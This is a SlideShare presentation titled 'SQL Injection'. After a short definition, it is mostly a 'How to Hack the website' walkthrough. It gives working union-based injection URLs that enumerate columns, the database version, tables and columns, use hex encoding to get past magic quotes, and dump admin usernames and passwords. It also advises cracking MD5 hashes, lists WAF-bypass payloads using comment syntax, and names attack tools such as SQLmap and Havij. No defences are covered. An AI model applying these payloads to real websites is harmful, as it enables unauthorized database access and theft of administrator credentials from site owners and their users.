SQL Injection


Published on

SQL Injection

Published in: Education, Technology
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

SQL Injection

  1. 1. SQL InjectionKaushal KishoreSr. Software EngineerOSSCube Pvt. Ltd.Kaushal.rahuljaiswal@gmail.comwww.osscube.com
  2. 2. What is SQL InjectionSQL injection is a technique that is applied by giving malicious inputs, thatresult in allowing the hacker to access over the database of the Host, incase if the database operations of that web sites is allowed directly...!"SQL injection is a code injection technique that exploits a securityvulnerability occurring in the database layer of an application. Thevulnerability is present when user input is either incorrectly filtered forstring literal escape characters embedded in SQL statements or user inputis not strongly typed and thereby unexpectedly executed. It is an instanceof a more general class of vulnerabilities that can occur whenever oneprogramming or scripting language is embedded inside another. SQLinjection attacks are also known as SQL insertion attacks".
  3. 3. How to Hack the website UsingSQL Injection
  4. 4. SQL Injection
  5. 5. Check Site is vulnerable or Not?Add the (Single Quote) sign with the integer value in URLhttp://www.examplesite.com/index.php?id=5If the site shows you an error it is vulnerable to SQL, lets say wefound a vulnerable site.
  6. 6. Find Number of Columnshttp://www.examplesite.com/index.php?id=5 order by 1--And we will keep increasing the number until we get an error.http://www.examplesite.com/index.php?id=5 order by 5--http://www.examplesite.com/index.php?id=5 order by 10--Lets say there is 10 columns in the database.
  7. 7. Find vulnerable columns.http://www.examplesite.com/index.php?id=-5 union select1,2,3,4,5,6,7,8,9,10--Notice that I have put a single - in front of the id number (id=-5)Since there is no page with the id -5 it simply put just clears thesites text for us. That makes it easier for us to find the data that weare looking for.Okay lets say the numbers 3, 6 and 9 popped up on the site, asvulnerable columns.
  8. 8. Find Database Versionhttp://www.examplesite.com/index.php?id=-5 union select1,2,@@version,4,5,6,7,8,9,10--And if that doesnt work then try this 1:http://www.examplesite.com/index.php?id=-5 union select1,2,version(),4,5,6,7,8,9,10--
  9. 9. Find Database Namehttp://www.examplesite.com/index.php?id=-5 union select 1,2,concat(database()) ,4,5,6,7,8,9,10--Write that name down so you wont forget it. Lets say the databasename i just extracted was named exampledatabaseIf the version is 4 or below, it is probably best that you just move on toanother site since you are gonna have to brute force the tables forinformation (which isnt a very good idea for starters like us )
  10. 10. Find the Tables Namehttp://www.examplesite.com/index.php?id=-5 union select1,2,group_concat(table_name),4,5,6,7,8,9,10 frominformation_schema.tables where table_schema=database()--http://www.examplesite.com/index.php?id=-5 union select1,2,concat(table_name),4,5,6,7,8,9,10 from information_schema.tableswhere table_schema=database()--http://www.examplesite.com/index.php?id=-5 union select1,2,table_name ,4,5,6,7,8,9,10 from information_schema.tables wheretable_schema=database()--
  11. 11. Find the Columns Namehttp://www.examplesite.com/index.php?id=-5 union select1,2,column_name,4,5,6,7,8,9,10 from information_schema.columnswhere table_name="admin"--If the site shows you an error now dont panic! All that means is thatMagic Quotes is turned on. To bypass this we need to convert thetext "admin" into hex.
  12. 12. Change the Name of Table toHexCopy the name of the table you are trying to access, visit the siteText to Hex, paste the name into the website where it says "SayHello To My Little Friend". Click Convert copy the hex into yourquery like this.http://www.examplesite.com/index.php?id=-5 union select1,2,column_name,4,5,6,7,8,9,10 from information_schema.columnswhere table_name=0x61646d696e--Notice the 0x before the hex string. This is to tell the server that thenext part is a hex string.You should now see all the columns inside the table.
  13. 13. Find the Content of the TablesLets say there are 2 columns called username and password. In orderto see what are inside of those columns we will use this query:http://www.examplesite.com/index.php?id=-5 union select1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10 fromexampledatabase.admin--This is where we needed the database name. Btw the 0x3a meanscolon ( : )Now you have the admin login!If it is decrypted, try to run it through some online md5 decrypters oruse my free crackedAnd now we have to find the admin login, to do so, once again you can
  14. 14. By Pass The WAFhttp://www.example.com/staffdetail.php?id=123+/*!union*/select+1,2,3,4,5,6,7--+http://www.example.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/1,2,3--http://www.example.com/staffdetail.php?id=123+/*!union*//*!select*/+all+1,2,table_name,4,5,6,7+FROM+information_schema.tables+WHERE+table_schema+=+database()+LIMIT+0,10--+
  15. 15. Tools for SQL InjectionSQL NinjaSQL MapHavij
  16. 16. Questions
  17. 17. Thank you for your Time andAttention!17